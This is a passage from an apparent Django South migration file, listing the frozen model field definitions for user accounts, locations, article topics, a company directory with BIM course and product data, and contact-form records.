'action_object_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'actor_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actor'", 'to': u"orm['contenttypes.ContentType']"}),
'actor_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'batch_time_minutes': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_batchable': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'target'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'timestamp_date': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'articles.topics': {
'Meta': {'object_name': 'Topics'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'topic_created_by'", 'to': u"orm['auth.User']"}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'on_nav': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'topic_children'", 'null': 'True', 'to': "orm['articles.Topics']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'topic_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'relationships': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_to'", 'symmetrical': 'False', 'through': u"orm['relationships.Relationship']", 'to': u"orm['auth.User']"}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'cities_light.city': {
'Meta': {'ordering': "['name']", 'unique_together': "(('region', 'name'), ('region', 'slug'))", 'object_name': 'City'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'feature_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'population': ('django.db.models.fields.BigIntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Region']", 'null': 'True', 'blank': 'True'}),
'search_names': ('cities_light.models.ToSearchTextField', [], {'default': "''", 'max_length': '4000', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': "'name_ascii'"})
},
u'cities_light.country': {
'Meta': {'ordering': "['name']", 'object_name': 'Country'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'code2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'code3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': "'name_ascii'"}),
'tld': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '5', 'blank': 'True'})
},
u'cities_light.region': {
'Meta': {'ordering': "['name']", 'unique_together': "(('country', 'name'), ('country', 'slug'))", 'object_name': 'Region'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': "'name_ascii'"})
},
u'companies.bimcourses': {
'Meta': {'object_name': 'BimCourses'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'bim_course_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bim_course_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.bimcoursestype': {
'Meta': {'object_name': 'BimCoursesType'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'bim_course_type_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bim_course_type_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.bimcurriculum': {
'Meta': {'object_name': 'BimCurriculum'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'bim_curriculum_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'bim_curriculum_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.brochure': {
'Meta': {'ordering': "['order']", 'object_name': 'Brochure', '_ormbases': [u'companies.Resource']},
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'companies.company': {
'Meta': {'ordering': "('title',)", 'object_name': 'Company'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'admin_primary': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'company_admin_primary'", 'null': 'True', 'to': u"orm['auth.User']"}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_admin_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'bim_courses': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_bim_course_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.BimCourses']"}),
'bim_courses_curriculum': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_bim_curriculum_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.BimCurriculum']"}),
'bim_courses_introduced': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'bim_courses_type': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_bim_course_type_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.BimCoursesType']"}),
'brochures': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_brochure_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Brochure']"}),
'city': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.City']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities_light.Country']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'company_created_by'", 'to': u"orm['auth.User']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'employees_count': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'fax': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'featured_home': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_image_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Image']"}),
'logo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['filer.Image']", 'null': 'True', 'blank': 'True'}),
'memberships': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_membership_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Membership']"}),
'operation_areas': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_OperationAreas_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.OperationAreas']"}),
'ownership': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_products_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Products']"}),
'project_size': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'related': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_company_list'", 'to': u"orm['companies.Company']", 'through': u"orm['companies.CompanyRelated']", 'blank': 'True', 'symmetrical': 'False', 'null': 'True'}),
'sectors': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_sector_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Sectors']"}),
'services': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_services_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Services']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'type_companies'", 'to': u"orm['companies.CompanyType']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'company_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'videos': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'company_video_list'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['companies.Video']"}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year_founded': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
u'companies.companyrelated': {
'Meta': {'ordering': "['from_company', 'relation']", 'unique_together': "(('from_company', 'to_company', 'relation'),)", 'object_name': 'CompanyRelated', 'db_table': "'company_company_related'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'companyrelated_created_by'", 'to': u"orm['auth.User']"}),
'from_company': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_company'", 'to': u"orm['companies.Company']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'relation': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'to_company': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_company'", 'to': u"orm['companies.Company']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'companyrelated_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.companytopic': {
'Meta': {'object_name': 'CompanyTopic'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'companies_companytopic_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'companies_companytopic_items'", 'to': "orm['articles.Topics']"})
},
u'companies.companytype': {
'Meta': {'ordering': "['title']", 'object_name': 'CompanyType'},
'company_form_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'companytype_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'topic_children'", 'null': 'True', 'to': u"orm['companies.CompanyType']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'companytype_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.image': {
'Meta': {'ordering': "['order']", 'object_name': 'Image', '_ormbases': [u'companies.Resource']},
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'companies.membership': {
'Meta': {'ordering': "['order']", 'object_name': 'Membership', '_ormbases': [u'companies.Resource']},
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'companies.operationareas': {
'Meta': {'object_name': 'OperationAreas'},
'countries': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'operation_areas_country_list'", 'symmetrical': 'False', 'to': u"orm['cities_light.Country']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'operationareas_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'OperationAreas_children'", 'null': 'True', 'to': u"orm['companies.OperationAreas']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'operationareas_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.products': {
'Meta': {'object_name': 'Products'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'product_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'product_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.resource': {
'Meta': {'ordering': "['company', 'order']", 'unique_together': "(('company', 'resource_type', 'resource_file'),)", 'object_name': 'Resource'},
'caption': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'company_resource_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'resource_file': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'company_resource_file'", 'to': u"orm['filer.File']"}),
'resource_type': ('django.db.models.fields.SmallIntegerField', [], {'default': '3'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'company_resource_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.sectors': {
'Meta': {'object_name': 'Sectors'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'sector_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'sector_children'", 'null': 'True', 'to': u"orm['companies.Sectors']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'sector_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.services': {
'Meta': {'object_name': 'Services'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'service_created_by'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique': 'True', 'max_length': '100', 'populate_from': "'name'", 'unique_with': '()'}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'service_updated_by'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'companies.video': {
'Meta': {'ordering': "['order']", 'object_name': 'Video', '_ormbases': [u'companies.Resource']},
'resource_external': ('embed_video.fields.EmbedVideoField', [], {'max_length': '200'}),
u'resource_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['companies.Resource']", 'unique': 'True', 'primary_key': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'envelope.companycontact': {
'Meta': {'object_name': 'CompanyContact'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'contact_company': ('django.db.models.fields.TextField', [], {}),
'contact_job_title': ('django.db.models.fields.TextField', [], {}),
'contact_phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_companycontact_created_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_box': ('django.db.models.fields.TextField', [], {}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '2'}),
'subject': ('django.db.models.fields.TextField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_companycontact_updated_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'user_name': ('django.db.models.fields.TextField', [], {})
},
u'envelope.productcontact': {
'Meta': {'object_name': 'ProductContact'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'contact_company': ('django.db.models.fields.TextField', [], {}),
'contact_job_title': ('django.db.models.fields.TextField', [], {}),
'contact_phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_productcontact_created_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_box': ('django.db.models.fields.TextField', [], {}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '2'}),
'subject': ('django.db.models.fields.TextField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_productcontact_updated_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'user_name': ('django.db.models.fields.TextField', [], {})
},
u'envelope.solutioncontact': {
'Meta': {'object_name': 'SolutionContact'},
'company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['companies.Company']"}),
'contact_company': ('django.db.models.fields.TextField', [], {}),
'contact_job_title': ('django.db.models.fields.TextField', [], {}),
